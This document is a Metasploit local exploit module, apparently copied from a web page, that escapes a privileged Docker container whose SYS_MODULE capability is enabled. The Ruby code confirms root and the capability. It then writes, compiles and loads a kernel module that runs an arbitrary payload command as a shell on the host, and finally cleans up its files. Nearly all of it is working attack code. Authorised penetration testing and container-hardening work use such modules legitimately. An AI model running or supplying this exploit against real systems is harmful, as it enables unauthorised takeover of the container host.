Docker Privileged Container Kernel Escape

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking

prepend Msf::Exploit::Remote::AutoCheck

include Msf::Post::File
include Msf::Post::Unix
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
{
‘Name’ => ‘Docker Privileged Container Kernel Escape’,
‘Description’ => %q{
This module performs a container escape onto the host as the daemon
user. It takes advantage of the SYS_MODULE capability. If that
exists and the linux headers are available to compile on the target,
then we can escape onto the host.
},
‘License’ => MSF_LICENSE,
‘Author’ => [
‘Nick Cottrell <Rad10Logic>’, # Module writer
‘Eran Ayalon’, # PoC/article writer
‘Ilan Sokol’ # PoC/article writer
],
‘Platform’ => %w[linux unix],
‘Arch’ => [ARCH_CMD],
‘Targets’ => [[‘Automatic’, {}]],
‘DefaultOptions’ => { ‘PrependFork’ => true, ‘WfsDelay’ => 20 },
‘SessionTypes’ => %w[shell meterpreter],
‘DefaultTarget’ => 0,
‘References’ => [
%w[URL https://www.cybereason.com/blog/container-escape-all-you-need-is-cap-capabilities],
%w[URL https://github.com/maK-/reverse-shell-access-kernel-module]],
‘DisclosureDate’ => ‘2014-05-01’, # Went in date of commits in github URL
‘Notes’ => {
‘Stability’ => [ CRASH_SAFE ],
‘Reliability’ => [ REPEATABLE_SESSION ],
‘SideEffects’ => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]}
}
)
)
register_advanced_options([
OptString.new(‘KernelModuleName’, [true, ‘The name that the kernel module will be called in the system’, rand_text_alpha(8)], regex: /^[\w-]+$/),
OptString.new(‘WritableContainerDir’, [true, ‘A directory where we can write files in the container’, “/tmp/.#{rand_text_alpha(4)}”])
])
end

# Check we have all the prerequisites to perform the escape
def check
# Checking database if host has already been disclosed as a container
container_name =
if active_db? && framework.db.workspace.hosts.where(address: session.session_host)&.first&.virtual_host
framework.db.workspace.hosts.where(address: session.session_host)&.first&.virtual_host
else
get_container_type
end

unless %w[docker podman lxc].include?(container_name.downcase)
return Exploit::CheckCode::Safe(‘Host does not appear to be container of any kind’)
end

# is root user
unless is_root?
return Exploit::CheckCode::Safe(‘Exploit requires root inside container’)
end

# Checking if the SYS_MODULE capability is enabled
capability_bitmask = read_file(‘/proc/1/status’)[/^CapEff:\s+[0-9a-f]{16}$/][/[0-9a-f]{16}$/].to_i(16)
unless capability_bitmask & 0x0000000000010000 > 0
return Exploit::CheckCode::Safe(‘SYS_MODULE Capability does not appear to be enabled’)
end

CheckCode::Vulnerable(‘Inside Docker container and target appears vulnerable.’)
end

def exploit
krelease = kernel_release
# Check if kernel header folders exist
kernel_headers_path = [
“/lib/modules/#{krelease}/build”,
“/usr/src/kernels/#{krelease}”
].find { |path| directory?(path) }
unless kernel_headers_path
fail_with(Failure::NoTarget, ‘Kernel headers for this target do not appear to be installed.’)
end
vprint_status(“Kernel headers found at: #{kernel_headers_path}”)

# Check that our required binaries are installed
unless command_exists?(‘insmod’)
fail_with(Failure::NoTarget, ‘insmod does not appear to be installed.’)
end
unless command_exists?(‘make’)
fail_with(Failure::NoTarget, ‘make does not appear to be installed.’)
end

# Check that container directory is writable
if directory?(datastore[‘WritableContainerDir’]) && !writable?(datastore[‘WritableContainerDir’])
fail_with(Failure::BadConfig, “#{datastore[‘WritableContainerDir’]} is not writable”)
end

# Checking that kernel module isn’t already running
if kernel_modules.include?(datastore[‘KernelModuleName’])
fail_with(Failure::BadConfig, “#{datastore[‘KernelModuleName’]} is already loaded into the kernel. You may need to remove it manually.”)
end

# Creating source files
print_status(‘Creating files…’)
mkdir(datastore[‘WritableContainerDir’]) unless directory?(datastore[‘WritableContainerDir’])

write_kernel_source(datastore[‘KernelModuleName’], payload.encoded)
write_makefile(datastore[‘KernelModuleName’])
register_files_for_cleanup([
“#{datastore[‘KernelModuleName’]}.c”,
‘Makefile’
].map { |filename| File.join(datastore[‘WritableContainerDir’], filename) })

# Making exploit
print_status(‘Compiling the kernel module…’)
results = cmd_exec(“make -C ‘#{datastore[‘WritableContainerDir’]}’ KERNEL_DIR=’#{kernel_headers_path}’ PWD=’#{datastore[‘WritableContainerDir’]}'”)
vprint_status(‘Make results’)
vprint_line(results)
register_files_for_cleanup([
‘Module.symvers’,
‘modules.order’,
“#{datastore[‘KernelModuleName’]}.mod”,
“#{datastore[‘KernelModuleName’]}.mod.c”,
“#{datastore[‘KernelModuleName’]}.mod.o”,
“#{datastore[‘KernelModuleName’]}.o”
].map { |filename| File.join(datastore[‘WritableContainerDir’], filename) })

# Checking if kernel file exists
unless file_exist?(“#{datastore[‘WritableContainerDir’]}/#{datastore[‘KernelModuleName’]}.ko”)
fail_with(Failure::PayloadFailed, ‘Kernel module did not compile. Run with verbose to see make errors.’)
end
print_good(‘Kernel module compiled successfully’)

# Loading module and running exploit
print_status(‘Loading kernel module…’)
results = cmd_exec(“insmod ‘#{datastore[‘WritableContainerDir’]}/#{datastore[‘KernelModuleName’]}.ko'”)

unless results.blank?
results = results.strip
vprint_status(‘Insmod results: ‘ + (results.count(“\n”) == 0 ? results : ”))
vprint_line(results) if results.count(“\n”) > 0
end
end

def cleanup
# Attempt to remove kernel module
if kernel_modules.include?(datastore[‘KernelModuleName’])
vprint_status(‘Cleaning kernel module’)
cmd_exec(“rmmod #{datastore[‘KernelModuleName’]}”)
end

# Check that kernel module was removed
if kernel_modules.include?(datastore[‘KernelModuleName’])
print_warning(‘Payload was not a oneshot and cannot be removed until session is ended’)
print_warning(“Kernel module [#{datastore[‘KernelModuleName’]}] will need to be removed manually”)
end
super
end

def write_kernel_source(filename, payload_content)
file_content = <<~SOURCE
#include<linux/init.h>
#include<linux/module.h>
#include<linux/kmod.h>

MODULE_LICENSE(“GPL”);

static int start_shell(void){
#{Rex::Text.to_c(payload_content, Rex::Text::DefaultWrap, ‘command’)}
char *argv[] = {“/bin/bash”, “-c”, command, NULL};
static char *env[] = {
“HOME=/”,
“TERM=linux”,
“PATH=/sbin:/bin:/usr/sbin:/usr/bin”, NULL };
return call_usermodehelper(argv[0], argv, env, UMH_WAIT_EXEC);
}

static int init_mod(void){
return start_shell();
}
static void exit_mod(void){

return;
}
module_init(init_mod);
module_exit(exit_mod);
SOURCE
filename = “#{filename}.c” unless filename.end_with?(‘.c’)
write_file(File.join(datastore[‘WritableContainerDir’], filename), file_content)
end

def write_makefile(filename)
file_contents = <<~SOURCE
obj-m +=#{filename}.o

all:
\tmake -C $(KERNEL_DIR) M=$(PWD) modules
clean:
\tmake -C $(KERNEL_DIR) M=$(PWD) clean
SOURCE
write_file(File.join(datastore[‘WritableContainerDir’], ‘Makefile’), file_contents)
end
end